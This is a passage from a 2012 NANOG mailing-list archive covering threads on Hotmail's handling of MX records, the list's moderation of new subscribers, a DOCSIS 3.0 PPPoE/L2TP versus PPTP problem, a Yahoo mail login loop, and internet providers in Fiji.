it. No. It is perfectly legal for A to accept mail for B, B for C, C for D and D for A with all mail being delivered to a host with a different name than the mail domain. It is not and never has been correct processing to lookup addresses records for a domain if the MX lookup fails. nodata/nxdomain are not failures. > Either way, I think I'd have to consider this -advanced- MTA > processing. You have to really know your stuff to get this one right. No. This is the behaviour you get with a MX oblivious MTA. > Regards, > Bill Herrin > > > > -- > William D. Herrin ................ herrin at dirtside.com bill at herrin.us > 3005 Crane Dr. ...................... Web: > Falls Church, VA 22042-3004 -- Mark Andrews, ISC 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: marka at isc.org From lists222 at m.l.vaunt.eu Mon Jul 30 14:04:36 2012 From: lists222 at m.l.vaunt.eu (Panashe Flack) Date: Mon, 30 Jul 2012 21:04:36 +0200 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: <20120728163636.49bf4f44@segv> References: <20120728163636.49bf4f44@segv> Message-ID: <20120730190436.8988.L@m.l.vaunt.eu> > As a quick update, we've implemented some list settings last week to help to > keep spam off the list. New subscribers are moderated until we're comfortable > with their posts. We rejected the idea of keyword based message filtering > since not only is a lot of work to maintain, it's trivial to get around it if > you really want to post banned words. > > Comments and suggestions are welcome. > > > Matt Griswold, on behalf of the NANOG Communications Committee > I dislike this change - how long are subscribers considered "new"? I believe (and I hope I'm wrong) that with this new rule the nanog maiing list will turn into another fulldisc (list activity greatly reduced) by this change. Before this change I had thought of nanog as the new fulldisc - I guess I will have to find yet ANOTHER mailing list for continued activity. And just for reference - have you guys SEEN the "Linux Kernel Mailing List"? - it gets frequent spam posts and yet is perfectly able to ignore the spam/irrelevant posts and continue on its remit. From valdis.kletnieks at vt.edu Mon Jul 30 12:35:35 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Mon, 30 Jul 2012 13:35:35 -0400 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: Your message of "Mon, 30 Jul 2012 21:04:36 +0200." <20120730190436.8988.L@m.l.vaunt.eu> References: <20120728163636.49bf4f44@segv> <20120730190436.8988.L@m.l.vaunt.eu> Message-ID: <20721.1343669735@turing-police.cc.vt.edu> On Mon, 30 Jul 2012 21:04:36 +0200, Panashe Flack said: > list for continued activity. And just for reference - have you guys > SEEN the "Linux Kernel Mailing List"? - it gets frequent spam posts > and yet is perfectly able to ignore the spam/irrelevant posts and > continue on its remit. For those who don't drink from the Linux-Kernel firehose, it averages 1 or 2 spams per day - and anywhere from 500 to 700 postings a day. As Linus Torvalds said, back when it was averaging 200 a day: "Note that nobody reads every post in linux-kernel. In fact, nobody who expects to have time left over to actually do any real kernel work will read even half. Except Alan Cox, but he's actually not human, but about a thousand gnomes working in under-ground caves in Swansea. None of the individual gnomes read all the postings either, they just work together really well." The list managers do an incredible job of stopping spam - but even if 50 or 75 a day got through, they'd just be lost in the noise. You're skipping several hundred messages a day, skipping a few more isn't any different. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From patrick at ianai.net Mon Jul 30 12:42:21 2012 From: patrick at ianai.net (Patrick W. Gilmore) Date: Mon, 30 Jul 2012 13:42:21 -0400 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: <20721.1343669735@turing-police.cc.vt.edu> References: <20120728163636.49bf4f44@segv> <20120730190436.8988.L@m.l.vaunt.eu> <20721.1343669735@turing-police.cc.vt.edu> Message-ID: <8679FADA-327F-4586-928D-006A054E3686@ianai.net> I'm sorry Panashe is upset by this rule. Interestingly, "Your search - Panashe Flack nanog - did not match any documents." So my guess is that a post from that account has not happened before, meaning the post was moderated yet still made it through. Has anyone done a data mining experiment to see how many posts a month are from "new" members? My guess is it is a trivial percentage. -- TTFN, patrick On Jul 30, 2012, at 13:35 , valdis.kletnieks at vt.edu wrote: > On Mon, 30 Jul 2012 21:04:36 +0200, Panashe Flack said: >> list for continued activity. And just for reference - have you guys >> SEEN the "Linux Kernel Mailing List"? - it gets frequent spam posts >> and yet is perfectly able to ignore the spam/irrelevant posts and >> continue on its remit. > > For those who don't drink from the Linux-Kernel firehose, it averages > 1 or 2 spams per day - and anywhere from 500 to 700 postings a day. > > As Linus Torvalds said, back when it was averaging 200 a day: > > "Note that nobody reads every post in linux-kernel. In fact, nobody who > expects to have time left over to actually do any real kernel work will > read even half. Except Alan Cox, but he's actually not human, but about > a thousand gnomes working in under-ground caves in Swansea. None of the > individual gnomes read all the postings either, they just work together > really well." > > The list managers do an incredible job of stopping spam - but even if > 50 or 75 a day got through, they'd just be lost in the noise. You're skipping > several hundred messages a day, skipping a few more isn't any different. > From shrdlu at deaddrop.org Mon Jul 30 12:57:28 2012 From: shrdlu at deaddrop.org (Etaoin Shrdlu) Date: Mon, 30 Jul 2012 10:57:28 -0700 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: <20120730190436.8988.L@m.l.vaunt.eu> References: <20120728163636.49bf4f44@segv> <20120730190436.8988.L@m.l.vaunt.eu> Message-ID: <5016CB08.7020901@deaddrop.org> On 7/30/2012 12:04 PM, Panashe Flack wrote: >> As a quick update, we've implemented some list settings last week to help to >> keep spam off the list. New subscribers are moderated until we're comfortable >> with their posts... > I dislike this change - how long are subscribers considered "new"? I applaud this change. If I still traveled, I'd show up to the next NANOG, and buy the committee a beer. Instead, I send them my thanks. I run a couple of mailing lists, and every once in a while, someone will subscribe and set off my cynicism meter. I hit the moderate button on the new account, and sad to say, I've only been wrong to do so once, out of the last ten times I did it. Thanks again. -- "My name is Ozymandias, king of kings: Look on my works, ye Mighty, and despair!" Nothing beside remains. Round the decay Of that colossal wreck, boundless and bare The lone and level sands stretch far away. From snoble at sonn.com Mon Jul 30 12:57:46 2012 From: snoble at sonn.com (Steven Noble) Date: Mon, 30 Jul 2012 10:57:46 -0700 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: <8679FADA-327F-4586-928D-006A054E3686@ianai.net> References: <20120728163636.49bf4f44@segv> <20120730190436.8988.L@m.l.vaunt.eu> <20721.1343669735@turing-police.cc.vt.edu> <8679FADA-327F-4586-928D-006A054E3686@ianai.net> Message-ID: <8929F2FB-6E61-41D9-9C39-621127F2929D@sonn.com> The fix for this issue is trivial. Every new signup should require a sponsor or a deposit of funds into a new member fund. Once a member has made a relevant post regarding a NANOG related item their funds are returned. If someone spams they forfeit the money and it is used to help defray the costs of attending NANOG for the 99%. If the poster has been sponsored by a current member, said member is flogged in public at the next meeting. ...runs Sent from my iPhone On Jul 30, 2012, at 10:42 AM, "Patrick W. Gilmore" wrote: > I'm sorry Panashe is upset by this rule. Interestingly, "Your search - Panashe Flack nanog - did not match any documents." So my guess is that a post from that account has not happened before, meaning the post was moderated yet still made it through. > > Has anyone done a data mining experiment to see how many posts a month are from "new" members? My guess is it is a trivial percentage. > > -- > TTFN, > patrick > > > On Jul 30, 2012, at 13:35 , valdis.kletnieks at vt.edu wrote: >> On Mon, 30 Jul 2012 21:04:36 +0200, Panashe Flack said: >>> list for continued activity. And just for reference - have you guys >>> SEEN the "Linux Kernel Mailing List"? - it gets frequent spam posts >>> and yet is perfectly able to ignore the spam/irrelevant posts and >>> continue on its remit. >> >> For those who don't drink from the Linux-Kernel firehose, it averages >> 1 or 2 spams per day - and anywhere from 500 to 700 postings a day. >> >> As Linus Torvalds said, back when it was averaging 200 a day: >> >> "Note that nobody reads every post in linux-kernel. In fact, nobody who >> expects to have time left over to actually do any real kernel work will >> read even half. Except Alan Cox, but he's actually not human, but about >> a thousand gnomes working in under-ground caves in Swansea. None of the >> individual gnomes read all the postings either, they just work together >> really well." >> >> The list managers do an incredible job of stopping spam - but even if >> 50 or 75 a day got through, they'd just be lost in the noise. You're skipping >> several hundred messages a day, skipping a few more isn't any different. >> > > From randy at psg.com Mon Jul 30 13:15:32 2012 From: randy at psg.com (Randy Bush) Date: Mon, 30 Jul 2012 11:15:32 -0700 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: <5016CB08.7020901@deaddrop.org> References: <20120728163636.49bf4f44@segv> <20120730190436.8988.L@m.l.vaunt.eu> <5016CB08.7020901@deaddrop.org> Message-ID: > I applaud this change. thanks MLC or whatever it calls itself this week randy From rgolodner at infratection.com Mon Jul 30 13:51:39 2012 From: rgolodner at infratection.com (rgolodner at infratection.com) Date: Mon, 30 Jul 2012 18:51:39 +0000 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts Message-ID: <714340437-1343674300-cardhu_decombobulator_blackberry.rim.net-1722338433-@b25.c10.bise6.blackberry> I as well think some temporary moderation is a good idea. It would have been nice to think we were all mature enough to have ignored such spew. I will continue to have faith and wish the moderators a very light work load. Richard Golodner ------Original Message------ From: Randy Bush To: Etaoin Shrdlu Cc: nanog at nanog.org Subject: Re: Update from the NANOG Communications Committee regarding recent off-topic posts Sent: Jul 30, 2012 13:15 > I applaud this change. thanks MLC or whatever it calls itself this week randy Sent via BlackBerry from T-Mobile From joelja at bogus.com Mon Jul 30 14:04:21 2012 From: joelja at bogus.com (joel jaeggli) Date: Mon, 30 Jul 2012 12:04:21 -0700 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: <8929F2FB-6E61-41D9-9C39-621127F2929D@sonn.com> References: <20120728163636.49bf4f44@segv> <20120730190436.8988.L@m.l.vaunt.eu> <20721.1343669735@turing-police.cc.vt.edu> <8679FADA-327F-4586-928D-006A054E3686@ianai.net> <8929F2FB-6E61-41D9-9C39-621127F2929D@sonn.com> Message-ID: <5016DAB5.6060905@bogus.com> On 7/30/12 10:57 AM, Steven Noble wrote: > The fix for this issue is trivial. Every new signup should require a sponsor or a deposit of funds into a new member fund. Once a member has made a relevant post regarding a NANOG related item their funds are returned. > > If someone spams they forfeit the money and it is used to help defray the costs of attending NANOG for the 99%. > > If the poster has been sponsored by a current member, said member is flogged in public at the next meeting. Most of the subscribers to the mailing list never post. > ...runs > > Sent from my iPhone > > On Jul 30, 2012, at 10:42 AM, "Patrick W. Gilmore" wrote: > >> I'm sorry Panashe is upset by this rule. Interestingly, "Your search - Panashe Flack nanog - did not match any documents." So my guess is that a post from that account has not happened before, meaning the post was moderated yet still made it through. >> >> Has anyone done a data mining experiment to see how many posts a month are from "new" members? My guess is it is a trivial percentage. >> >> -- >> TTFN, >> patrick >> >> >> On Jul 30, 2012, at 13:35 , valdis.kletnieks at vt.edu wrote: >>> On Mon, 30 Jul 2012 21:04:36 +0200, Panashe Flack said: >>>> list for continued activity. And just for reference - have you guys >>>> SEEN the "Linux Kernel Mailing List"? - it gets frequent spam posts >>>> and yet is perfectly able to ignore the spam/irrelevant posts and >>>> continue on its remit. >>> For those who don't drink from the Linux-Kernel firehose, it averages >>> 1 or 2 spams per day - and anywhere from 500 to 700 postings a day. >>> >>> As Linus Torvalds said, back when it was averaging 200 a day: >>> >>> "Note that nobody reads every post in linux-kernel. In fact, nobody who >>> expects to have time left over to actually do any real kernel work will >>> read even half. Except Alan Cox, but he's actually not human, but about >>> a thousand gnomes working in under-ground caves in Swansea. None of the >>> individual gnomes read all the postings either, they just work together >>> really well." >>> >>> The list managers do an incredible job of stopping spam - but even if >>> 50 or 75 a day got through, they'd just be lost in the noise. You're skipping >>> several hundred messages a day, skipping a few more isn't any different. >>> >> > From bill at herrin.us Mon Jul 30 15:07:37 2012 From: bill at herrin.us (William Herrin) Date: Mon, 30 Jul 2012 10:07:37 -1000 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <20120730170330.C039F23218DD@drugs.dv.isc.org> References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> <20120727013411.A55B12311FA5@drugs.dv.isc.org> <20120727024538.46BAF23125D1@drugs.dv.isc.org> <20120730170330.C039F23218DD@drugs.dv.isc.org> Message-ID: On Mon, Jul 30, 2012 at 7:03 AM, Mark Andrews wrote: > In message , William Herrin writes: >> What *should* happen here is that the guy's web server should reject >> the port 25 connection (an SMTP soft fail condition) and on the next >> retry hotmail should find the MX record and follow it. > > No. It is perfectly legal for A to accept mail for B, B for C, C > for D and D for A with all mail being delivered to a host with a > different name than the mail domain. It is not and never has been > correct processing to lookup addresses records for a domain if the > MX lookup fails. nodata/nxdomain are not failures. Hi Mark, If you can reference where in the SMTP RFC it offers an authoritative explanation what to do when merging results from various naming systems where one but not all of the naming systems has generated an error then let's read it. If not... your common sense says one thing, mine says another and folks implementing mail systems should be aware the implications. Until then, my view is that a lookup failure when seeking an MX record should only block the MTA from seeking an address record in the DNS. It should still seek an address record in higher priority naming systems and use it if it finds one. If correct, and I think it is, that's a pretty subtle thing to program for... something easily gotten wrong. Regards, Bill Herrin -- William D. Herrin ................ herrin at dirtside.com bill at herrin.us 3005 Crane Dr. ...................... Web: Falls Church, VA 22042-3004 From valdis.kletnieks at vt.edu Mon Jul 30 15:26:10 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Mon, 30 Jul 2012 16:26:10 -0400 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: Your message of "Mon, 30 Jul 2012 10:07:37 -1000." References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> <20120727013411.A55B12311FA5@drugs.dv.isc.org> <20120727024538.46BAF23125D1@drugs.dv.isc.org> <20120730170330.C039F23218DD@drugs.dv.isc.org> Message-ID: <30240.1343679970@turing-police.cc.vt.edu> On Mon, 30 Jul 2012 10:07:37 -1000, William Herrin said: > If you can reference where in the SMTP RFC it offers an authoritative > explanation what to do when merging results from various naming > systems where one but not all of the naming systems has generated an > error then let's read it. RFC5321, section 5.1 is pretty clear on it: 5.1. Locating the Target Host Once an SMTP client lexically identifies a domain to which mail will be delivered for processing (as described in Sections 2.3.5 and 3.6), a DNS lookup MUST be performed to resolve the domain name (RFC 1035 [2]). The names are expected to be fully-qualified domain names (FQDNs): mechanisms for inferring FQDNs from partial names or local aliases are outside of this specification. The Internet uses DNS. You use some other scheme at your own peril, and probably shouldn't expect said other scheme to work outside the range of your administrative control. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From jra at baylink.com Mon Jul 30 15:35:40 2012 From: jra at baylink.com (Jay Ashworth) Date: Mon, 30 Jul 2012 16:35:40 -0400 (EDT) Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: Message-ID: <543571.16724.1343680540186.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "Randy Bush" > thanks MLC or whatever it calls itself this week C'mon, Randy; It's been called that since it kicked me off 7 years ago. :-) Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA +1 727 647 1274 From patrick at ianai.net Mon Jul 30 15:38:07 2012 From: patrick at ianai.net (Patrick W. Gilmore) Date: Mon, 30 Jul 2012 16:38:07 -0400 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: <543571.16724.1343680540186.JavaMail.root@benjamin.baylink.com> References: <543571.16724.1343680540186.JavaMail.root@benjamin.baylink.com> Message-ID: <36657963-2A5B-4B0B-B105-CA0AD24702D6@ianai.net> On Jul 30, 2012, at 16:35 , Jay Ashworth wrote: >> thanks MLC or whatever it calls itself this week > > C'mon, Randy; It's been called that since it kicked me off 7 years ago. :-) Except, of course, it has been called the Communications Committee for a while now. (The change was made because the committee took responsibility for more than just the mailing list.) But 1 change in 7 years made years ago does not, IMHO, merit a "whatever it calls itself this week" snark. -- TTFN, patrick From brian.peter.dickson at gmail.com Mon Jul 30 17:28:27 2012 From: brian.peter.dickson at gmail.com (Brian Dickson) Date: Mon, 30 Jul 2012 18:28:27 -0400 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts Message-ID: > > As a quick update, we've implemented some list settings last week to help > to > > keep spam off the list. New subscribers are moderated until we're > comfortable > with their posts. We rejected the idea of keyword based message filtering > since not only is a lot of work to maintain, it's trivial to get around it > if > you really want to post banned words. > Comments and suggestions are welcome. > Matt Griswold, on behalf of the NANOG Communications Committee > > I've always liked the idea found in xkcd.com/810 ;-). Brian From MGauvin at dryden.ca Mon Jul 30 18:08:32 2012 From: MGauvin at dryden.ca (Mark Gauvin) Date: Mon, 30 Jul 2012 18:08:32 -0500 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: References: Message-ID: <03ED7B75-D1C2-40D3-94DD-0DFFF7ECC52F@dryden.ca> On list spam has been minimal but off list cold call type emails have been mounting for several months Sent from my iPhone On 2012-07-30, at 5:29 PM, "Brian Dickson" wrote: >> >> As a quick update, we've implemented some list settings last week >> to help >> to >> >> keep spam off the list. New subscribers are moderated until we're >> comfortable >> with their posts. We rejected the idea of keyword based message >> filtering >> since not only is a lot of work to maintain, it's trivial to get >> around it >> if >> you really want to post banned words. >> Comments and suggestions are welcome. >> Matt Griswold, on behalf of the NANOG Communications Committee >> >> I've always liked the idea found in xkcd.com/810 ;-). > > Brian From allenmckinleykitchen at gmail.com Mon Jul 30 21:23:26 2012 From: allenmckinleykitchen at gmail.com (Allen McKinley Kitchen (gmail)) Date: Mon, 30 Jul 2012 22:23:26 -0400 Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: <5016DAB5.6060905@bogus.com> References: <20120728163636.49bf4f44@segv> <20120730190436.8988.L@m.l.vaunt.eu> <20721.1343669735@turing-police.cc.vt.edu> <8679FADA-327F-4586-928D-006A054E3686@ianai.net> <8929F2FB-6E61-41D9-9C39-621127F2929D@sonn.com> <5016DAB5.6060905@bogus.com> Message-ID: <5088408F-6BB1-4C5C-9D29-50060ADF3C0C@gmail.com> On Jul 30, 2012, at 15:04, joel jaeggli wrote: > On 7/30/12 10:57 AM, Steven Noble wrote: >> The fix for this issue is trivial. Every new signup ... > Most of the subscribers to the mailing list never post. > >> +1 (from an inveterate but VERY appreciative lurker) ..Allen From mysidia at gmail.com Mon Jul 30 21:27:17 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Mon, 30 Jul 2012 21:27:17 -0500 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <30240.1343679970@turing-police.cc.vt.edu> References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> <20120727013411.A55B12311FA5@drugs.dv.isc.org> <20120727024538.46BAF23125D1@drugs.dv.isc.org> <20120730170330.C039F23218DD@drugs.dv.isc.org> <30240.1343679970@turing-police.cc.vt.edu> Message-ID: On 7/30/12, valdis.kletnieks at vt.edu wrote: > On Mon, 30 Jul 2012 10:07:37 -1000, William Herrin said: > The Internet uses DNS. You use some other scheme at your own peril, Aside from that RFC974 [Page 3] gives mailers significant leeway in deciding how to handle errors: " Mailers are expected to do something reasonable in the face of an error. The behaviour for each type of error is not specified here, but implementors should note that different types of errors should probably be treated differently. " Attempting to find another path for an apparently unroutable message (all MX offline) is not entirely out of the question. You may not assume that such measures will not be attempted, if anyone could consider it a 'reasonable' error handling procedure. I will echo that; go back to the robustness principal of being liberal in what you accept.... You should either not listen on port 25, or you should not create that A record pointing to a mail server that won't actually accept mail. When "yourdomain.example.com" has an A record, all the services listening on that address are services for the domain. "Relay not allowed" to the same domain may be considered nonsensical, and a mailer converting its error recovery attempt into a permanent error at that point, may be reasoned. -- -JH From dylan at corp.power1.com Tue Jul 31 08:18:14 2012 From: dylan at corp.power1.com (Dylan Bouterse) Date: Tue, 31 Jul 2012 13:18:14 +0000 Subject: Qwest outage (Tampa) Message-ID: <218AB54691EB49439829EFD136F473CF27B16E6F@exchange2k10.corp.power1.com> Is anybody familiar with the current Qwest outage in the Tampa area? Dylan From morrowc.lists at gmail.com Tue Jul 31 11:06:32 2012 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Tue, 31 Jul 2012 12:06:32 -0400 Subject: Qwest outage (Tampa) In-Reply-To: <218AB54691EB49439829EFD136F473CF27B16E6F@exchange2k10.corp.power1.com> References: <218AB54691EB49439829EFD136F473CF27B16E6F@exchange2k10.corp.power1.com> Message-ID: redirect to outages@ On Tue, Jul 31, 2012 at 9:18 AM, Dylan Bouterse wrote: > Is anybody familiar with the current Qwest outage in the Tampa area? > > Dylan > > From jra at baylink.com Tue Jul 31 11:46:10 2012 From: jra at baylink.com (Jay Ashworth) Date: Tue, 31 Jul 2012 12:46:10 -0400 (EDT) Subject: Update from the NANOG Communications Committee regarding recent off-topic posts In-Reply-To: <36657963-2A5B-4B0B-B105-CA0AD24702D6@ianai.net> Message-ID: <32200673.17164.1343753170493.JavaMail.root@benjamin.baylink.com> ----- Original Message ----- > From: "Patrick W. Gilmore" > Except, of course, it has been called the Communications Committee for > a while now. (The change was made because the committee took > responsibility for more than just the mailing list.) My turn for "silly me". > But 1 change in 7 years made years ago does not, IMHO, merit a > "whatever it calls itself this week" snark. No... not, it doesn't. Maybe it's been less time in Japan? Cheers, -- jra -- Jay R. Ashworth Baylink jra at baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://baylink.pitas.com 2000 Land Rover DII St Petersburg FL USA #natog +1 727 647 1274 From bkain1 at ford.com Tue Jul 31 11:47:18 2012 From: bkain1 at ford.com (Kain, Rebecca (.)) Date: Tue, 31 Jul 2012 16:47:18 +0000 Subject: mail.yahoo.com Message-ID: <7DB845D64966DC44A1CC592780539B4BA72FEE@nafmbx47.exchange.ford.com> It just stopped loading for me and when it did come up, and I got a "terms of agreement" new pop up which circles in an endless loop no matter what you click. Anyone else seeing this today at yahoo.com? From blakangel at gmail.com Tue Jul 31 11:50:14 2012 From: blakangel at gmail.com (Keith Simonsen) Date: Tue, 31 Jul 2012 09:50:14 -0700 Subject: mail.yahoo.com In-Reply-To: <7DB845D64966DC44A1CC592780539B4BA72FEE@nafmbx47.exchange.ford.com> References: <7DB845D64966DC44A1CC592780539B4BA72FEE@nafmbx47.exchange.ford.com> Message-ID: <50180CC6.9030202@gmail.com> Kain, Rebecca (.) wrote: > It just stopped loading for me and when it did come up, and I got a "terms of agreement" new pop up which circles in an endless loop no matter what you click. Anyone else seeing this today at yahoo.com? > Yeah, I'm getting username/password incorrect errors on my android phone as well as seeing the looping terms of agreement and some type of Server Load Error after hitting agree on the web site. I also tried reading the new ToS and Privacy Policy and was unable to connect to those servers with both Chrome and FF. -Keith From iptech at northrock.bm Mon Jul 30 07:33:51 2012 From: iptech at northrock.bm (iptech) Date: Mon, 30 Jul 2012 09:33:51 -0300 Subject: DOCSIS 3.0 & PPPoE/L2TP compatibility In-Reply-To: <501678C9.4060604@northrock.bm> References: <501678C9.4060604@northrock.bm> Message-ID: <50167F2F.1020901@northrock.bm> Hi, We are a small ISP and have a setup in place with the local cable company for terminating their users via L2TP for Internet access. However they have just announced to us that they are moving to a DOCSIS 3.0 compliant setup, and this standard no longer supports PPPoE via L2TP, and can now only offer PPTP for terminating with us. We have already begun replacing our Cisco 7206VXR LNS devices with Cisco ASR 1Ks and as you will be aware the older 7206 can do both L2TP and PPTP, whereas the ASR1k can do only L2TP. I do not have any experience in the cable arena, but from what I have read in the DOCSIS standards, each version has maintained backwards compatibility, therefore I am very surprised our CableCo has claimed they cannot do PPPoE/L2TP anymore. The CMTS they are currently using is a Cisco, and now they are moving to a new ARRIS CMTS. I have not been able to find any information on this device and what it can do or not. With the ASR1K marked as the natural upgrade path for LNS functions, therefore I cannot believe that it is not fully compatible with DOCSIS 3.0. From what I can tell the only way to accommodate the new CMTS PPTP connections will be to terminate them on the legacy 7206VXR, which at the end of the day is a backwards step. I would greatly appreciate if anyone can give me any pointers and/or suggestions on this matter, so I can understand it and move it forward. FYI: The driver for the CMTS upgrades is to offer higher bandwidth access speeds 15mb-20mb. Thank you. From source_route at yahoo.com Tue Jul 31 15:14:41 2012 From: source_route at yahoo.com (Philip Lavine) Date: Tue, 31 Jul 2012 13:14:41 -0700 (PDT) Subject: Fiji Islands Message-ID: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> Who offeres Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? From jfbeam at gmail.com Tue Jul 31 15:19:31 2012 From: jfbeam at gmail.com (Ricky Beam) Date: Tue, 31 Jul 2012 16:19:31 -0400 Subject: DOCSIS 3.0 & PPPoE/L2TP compatibility In-Reply-To: <50167F2F.1020901@northrock.bm> References: <501678C9.4060604@northrock.bm> <50167F2F.1020901@northrock.bm> Message-ID: On Mon, 30 Jul 2012 08:33:51 -0400, iptech wrote: > 3.0 compliant setup, and this standard no longer supports PPPoE via > L2TP, and can now only offer PPTP for terminating with us. As I recall from my reading of "the standard", there's nothing in there to prevent any tunneling on top of the DOCSIS bridged ethernet. I suspect this is not a "standard" problem but an ISP problem... their new hardware doesn't support PPPoE/L2TP, it's an additional license, or they don't know how (or unwilling) to configure it. (I'm assuming the PPPoE is between you and the customer, and L2TP is between your network and the cable network. i.e. L2TP is how your customers are brought to you from the cable network.) I have no documentation on ARRIS either, so I don't know what they can/cannot do. From valdis.kletnieks at vt.edu Tue Jul 31 15:27:54 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Tue, 31 Jul 2012 16:27:54 -0400 Subject: DOCSIS 3.0 & PPPoE/L2TP compatibility In-Reply-To: Your message of "Mon, 30 Jul 2012 09:33:51 -0300." <50167F2F.1020901@northrock.bm> References: <501678C9.4060604@northrock.bm> <50167F2F.1020901@northrock.bm> Message-ID: <46981.1343766474@turing-police.cc.vt.edu> On Mon, 30 Jul 2012 09:33:51 -0300, iptech said: > 3.0 compliant setup, and this standard no longer supports PPPoE via > L2TP, and can now only offer PPTP for terminating with us. "Hi ISP, meet Moxie Marlinspike. Moxie, meet ISP. I think you two have something to discuss..." -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From swm at emanon.com Tue Jul 31 15:39:47 2012 From: swm at emanon.com (Scott Morris) Date: Tue, 31 Jul 2012 16:39:47 -0400 Subject: Fiji Islands In-Reply-To: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> References: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> Message-ID: <50184293.9040607@emanon.com> Hell... who needs help doing any sort of work over there??? I'd love to find a way to bind work and vacation spots together! :) Scott Twitter: @ScottMorrisCCIE E-mail: swm at emanon.com Knowledge is power. Power corrupts. Study hard and be Eeeeviiiil...... On 7/31/12 4:14 PM, Philip Lavine wrote: > Who offeres Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? > > From khelms at ispalliance.net Tue Jul 31 15:46:52 2012 From: khelms at ispalliance.net (Scott Helms) Date: Tue, 31 Jul 2012 16:46:52 -0400 Subject: Fwd: Re: DOCSIS 3.0 & PPPoE/L2TP compatibility In-Reply-To: <501843BC.5060700@zcorum.com> References: <501843BC.5060700@zcorum.com> Message-ID: <5018443C.6010404@ispalliance.net> I've actually run into this specific problem and the issue your running into is that at no time was PPPoE part of the DOCSIS specification. It was supported on several CMTSs because the Cisco UBR shares much of its OS with more mainline Cisco routers which support L2TP and a host of other non-DOCSIS related protocols. It was also widely supported on some of the earliest CMTSs which were bridges instead of routers (then you needed a separate box to be the LNS). The real problem isn't a change in DOCSIS version but that they choose a platform that doesn't share a code base with a general purpose router. This could have been happenstance or by design, but I can tell you your chances of getting PPPoE to work at all on that platform (even for the cable operator) are not high because the box will not operate as a bridge and there is no (AFAIK) way to relay the PPP discover packets. The D3 Arris is either a C4 or a C4C: http://www.arrisi.com/products/product.asp?id=3 On 7/30/2012 8:33 AM, iptech wrote: > Hi, > > We are a small ISP and have a setup in place with the local cable > company for terminating their users via L2TP for Internet access. > However they have just announced to us that they are moving to a > DOCSIS 3.0 compliant setup, and this standard no longer supports PPPoE > via L2TP, and can now only offer PPTP for terminating with us. > > We have already begun replacing our Cisco 7206VXR LNS devices with > Cisco ASR 1Ks and as you will be aware the older 7206 can do both L2TP > and PPTP, whereas the ASR1k can do only L2TP. I do not have any > experience in the cable arena, but from what I have read in the DOCSIS > standards, each version has maintained backwards compatibility, > therefore I am very surprised our CableCo has claimed they cannot do > PPPoE/L2TP anymore. > > The CMTS they are currently using is a Cisco, and now they are moving > to a new ARRIS CMTS. I have not been able to find any information on > this device and what it can do or not. With the ASR1K marked as the > natural upgrade path for LNS functions, therefore I cannot believe > that it is not fully compatible with DOCSIS 3.0. > > From what I can tell the only way to accommodate the new CMTS PPTP > connections will be to terminate them on the legacy 7206VXR, which at > the end of the day is a backwards step. I would greatly appreciate if > anyone can give me any pointers and/or suggestions on this matter, so > I can understand it and move it forward. > > FYI: The driver for the CMTS upgrades is to offer higher bandwidth > access speeds 15mb-20mb. > > Thank you. > > > > > -- Scott Helms Vice President of Technology ZCorum (678) 507-5000 -------------------------------- http://twitter.com/kscotthelms -------------------------------- -- Scott Helms Vice President of Technology ZCorum (678) 507-5000 -------------------------------- http://twitter.com/kscotthelms -------------------------------- From zaid at zaidali.com Tue Jul 31 15:56:10 2012 From: zaid at zaidali.com (Zaid Ali) Date: Tue, 31 Jul 2012 13:56:10 -0700 Subject: Fiji Islands In-Reply-To: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> References: <1343765681.21108.YahooMailNeo@web121701.mail.ne1.yahoo.com> Message-ID: Connect is your best bet http://www.connect.com.fj/ Unwired is also a local competitor but I am not sure if they have coverage in Yaqara. Lautoka is a business district so you can get connectivity there from Connect and Unwired but Yaqara you might be quite limited since its a rural area. Send me a message if you need introduction to folks, I am still connected to some local telco and network engineers there. Zaid On Jul 31, 2012, at 1:14 PM, Philip Lavine wrote: > Who offeres Internet Bandwidth in Fiji Islands (Lautoka and Yaqara)? From network.ipdog at gmail.com Tue Jul 31 16:04:24 2012 From: 